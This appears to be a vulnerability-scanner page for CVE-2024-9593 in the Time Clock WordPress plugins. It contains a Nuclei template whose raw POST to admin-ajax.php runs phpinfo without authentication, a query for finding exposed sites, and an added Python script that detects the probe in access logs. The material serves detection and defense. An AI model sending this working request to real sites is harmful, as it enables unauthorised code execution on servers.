
Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution

ID: CVE-2024-9593

Severity: high

Author: s4e-io

Tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro

The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the ‘etimeclockwp_load_function_callback’ function. This allows unauthenticated attackers to execute code on the server. The invoked function’s parameters cannot be specified.

```yaml
id: CVE-2024-9593

info:
  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
    - https://github.com/RandomRobbieBF/CVE-2024-9593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2024-9593
    cwe-id: CWE-94
    epss-score: 0.00052
    epss-percentile: 0.21567
  metadata:
    max-request: 2
    verified: true
    vendor: scott_paterson
    product: time-clock & time-clock-pro
    framework: wordpress
    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro

flow: http(1) && http(2)

http:
  # Request 1: confirm the plugin is present before sending the check
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/time-clock")'
          - 'status_code == 200'
        condition: and
        internal: true

  # Request 2: the vulnerable admin-ajax action; a phpinfo() page in the
  # response confirms the unauthenticated function call
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        function=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a0047304502210094906ecb964d48fa5bc30c1f23e37a672e1cf87302bc5b237e5b30a894a0d2f202204e48586a7994b3d24a57ea55a95d5e585e2ab5349fd94ab05928e13b492e889d:922c64590222798bb761d5b6d8e72950
```

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

```shell
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9593.yaml"
```
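The template above finds hosts that are still exposed; the complementary defender-side question is whether anyone has already tried the vulnerable action against a site. The following Python script is an added example, not part of the Nuclei template or the plugin, and the log lines in it are constructed. It scans web-server access logs in the common "combined" format and flags every request to `/wp-admin/admin-ajax.php` whose query string carries the `etimeclockwp_load_function` action named in the template. Because the POST body (`function=phpinfo`) is not written to access logs, the match keys on the action parameter, which is in the URL and therefore logged regardless of the HTTP method used.

```python
"""Access-log detection for CVE-2024-9593 probe traffic (added example).

Hypothetical defender-side helper, not part of the Nuclei template or the
plugin. Flags requests to the vulnerable admin-ajax action named in the
template. The POST body is not logged, so the check keys on the query string.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

VULNERABLE_ACTION = "etimeclockwp_load_function"
AJAX_PATH = "/wp-admin/admin-ajax.php"

# Apache/nginx "combined" format:
# ip - user [time] "METHOD target HTTP/x.y" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass(frozen=True)
class Finding:
    ip: str
    time: str
    method: str
    status: int


def is_time_clock_probe(method: str, target: str) -> bool:
    """True when the request targets admin-ajax.php with the vulnerable action.

    The method is accepted for completeness but not filtered on: the action
    is read from the query string whether the request was a GET or a POST.
    """
    parts = urlsplit(target)
    if parts.path != AJAX_PATH:
        return False
    actions = parse_qs(parts.query).get("action", [])
    return VULNERABLE_ACTION in actions


def find_time_clock_probes(lines):
    """Return a Finding for every log line that hits the vulnerable action."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the whole run
        if is_time_clock_probe(m["method"], m["target"]):
            findings.append(
                Finding(m["ip"], m["time"], m["method"], int(m["status"]))
            )
    return findings


# Constructed sample log lines (not real traffic); the second and fourth
# lines carry the vulnerable action, the others are ordinary WordPress traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Oct/2024:12:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Oct/2024:12:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1" 200 68211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2024:12:03:15 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 73 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2024:12:03:16 +0000] "GET /wp-admin/admin-ajax.php?foo=1&action=etimeclockwp_load_function HTTP/1.1" 400 12 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for f in find_time_clock_probes(SAMPLE_LOG):
        print(f"{f.time} {f.ip} {f.method} -> HTTP {f.status}")
```

A 200 response with a large body on such a request (as in the second sample line) is the pattern the template's own matchers look for, and is the one worth escalating; a 4xx may mean the plugin was already updated or the request was blocked upstream. Plugin versions after 1.2.2 (Time Clock) and 1.1.4 (Time Clock Pro) are the fix named on this page.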
